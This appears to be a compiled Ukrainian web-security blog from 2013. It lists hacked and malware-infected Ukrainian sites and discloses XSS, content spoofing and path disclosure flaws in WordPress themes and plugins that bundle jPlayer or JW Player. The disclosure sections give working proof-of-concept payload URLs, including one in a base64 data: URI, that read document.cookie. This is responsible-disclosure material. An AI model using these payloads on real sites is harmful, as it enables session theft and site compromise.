Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://utmlviv.gov.ua (хакером LORD H) - 21.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://milicialviv.gov.ua (хакером LORD H) - 21.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://sbuda-rada.gov.ua (хакером ulow) - 19.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://dpsua.com.ua (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://vnl.com.ua (хакером s13doeL) - 12.03.2013, зараз сайт вже виправлений адмінами
• http://www.galaxie.com.ua (хакером Hmei7) - 12.03.2013, зараз сайт вже виправлений адмінами
• http://aclemberg.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://aerobud-zahid.com.ua (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://agrosmak.lviv.ua (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://pokraska-mdf.kiev.ua (хакером rEd X) - 17.04.2013, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://gdz.org.ua - інфекція була виявлена 25.04.2013. Зараз сайт входить до переліку підозрілих.
• http://osvitakp.com.ua - інфекція була виявлена 10.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://chutovo.at.ua - інфекція була виявлена 05.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://kam-pod.in.ua - інфекція була виявлена 05.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://dukat.km.ua - інфекція була виявлена 22.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://1school.vn.ua - інфекція була виявлена 04.03.2013. Зараз сайт входить до переліку підозрілих.
• http://tenet.km.ua - інфекція була виявлена 21.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://direktor.at.ua - інфекція була виявлена 04.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://dir.com.ua - інфекція була виявлена 02.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://electron-service.com.ua - інфекція була виявлена 05.04.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Traffic Analyzer, Spiffy XSPF Player та Spider Video Player. Для котрих з’явилися експлоіти. Traffic Analyzer - це плагін для аналіза трафіка, Spiffy XSPF Player - це медіа плеєр, Spider Video Player - це відео плеєр.

• WordPress Traffic Analyzer Cross Site Scripting (деталі)
• WordPress Spiffy XSPF Player 0.1 SQL Injection (деталі)
• WordPress Spider Video Player 2.1 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У січні, 31.01.2013, я виявив Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темах для WordPress, що містять jPlayer.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. Зокрема в багатьох плагінах і темах для WordPress. Плюс є багато сайтів, на яких Jplayer.swf розміщена в інших папках окрім плагінів і тем. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по темам для WordPress можна знайти 313000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Studiozen, Photocrati, Music, Imperial Fairytale та Feather12. Та тисячі інших уразливих тем для WordPress (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

Studiozen:

http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Photocrati:

http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Music:

http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Imperial Fairytale:

http://site/wp-content/themes/imperial-fairytale/assets/swf/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alertu0028document.cookieu0029%3E

Feather12:

http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/studiozen/

http://site/wp-content/themes/photocrati-theme/

http://site/wp-content/themes/music/

http://site/wp-content/themes/imperial-fairytale/

http://site/wp-content/themes/feather12/

Вразливі наступні веб додатки: всі версії тем Studiozen, Photocrati, Music, Imperial Fairytale та Feather12.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://koryukivka-rada.gov.ua (хакером Hmei7) - 09.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://rekord.gov.ua (хакером Hmei7) - 10.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://belwitec.com.ua (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://cargo-euro.com (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://dju.org.ua (хакером rEd X) - 17.04.2013, зараз сайт вже виправлений адмінами

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагінах для WordPress, що містять jPlayer. Про що вже сповістив розробників п’яти наведених плагінів.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по плагінам для WordPress можна знайти 239000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох плагінах для WordPress. Серед них MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer і WP jPlayer. Та існують інші уразливі плагіни для WordPress з Jplayer.swf (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

MP3-jPlayer:

http:/site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Haiku minimalist audio player:

http:/site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Background Music:

http:/site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Jammer:

http:/site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

WP jPlayer:

http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Вразливі наступні веб додатки: MP3-jPlayer 1.8.3 і попередні версії, Haiku minimalist audio player 1.0.0 і попередні версії, Background Music 1.0 і попередні версії, Jammer 0.2 і попередні версії, WP jPlayer 0.1 і попередні версії.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://pk-alligator.com.ua - інфекція була виявлена 05.04.2013. Зараз сайт входить до переліку підозрілих.
• http://top.zp.ua - інфекція була виявлена 21.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://volfy.at.ua - інфекція була виявлена 18.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://best.ua - інфекція була виявлена 23.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://gorlovkadosk.net.ua - інфекція була виявлена 12.04.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mathjax Latex, podPress та FuneralPress. Для котрих з’явилися експлоіти. Mathjax Latex - це плагін для додання підтримки latex і mathml формул, podPress - це плагін для подкастінга, FuneralPress - це похоронний менеджер та гостьова книга.

• WordPress Mathjax Latex 1.1 Cross Site Request Forgery (деталі)
• WordPress podPress 8.8.10.13 Cross Site Scripting (деталі)
• WordPress FuneralPress 1.1.6 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

У грудні, 22.12.2012, я знайшов Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Colormix для WordPress. Що аналогічні уразливостям в темах для WP від RocketTheme.

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/colormix/ в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Colormix для WordPress.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.gutszndn.gov.ua (хакером Sejeal) - 04.02.2013 - похаканий державний сайт, дефейс на сайті вже виправлений адмінами, але зараз він взломаний black SEO і на ньому розміщені лінки на порно сайти
• http://romen-region.gov.ua (хакерами з Kosova Hackers Crew) - 07.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://paritet-info.com (хакером Sejeal) - 21.01.2013, зараз сайт вже виправлений адмінами
• http://srkom.snu.edu.ua (хакером joker)
• http://vipdirection.com (хакером haxorsistz) - 04.2013, зараз сайт вже виправлений адмінами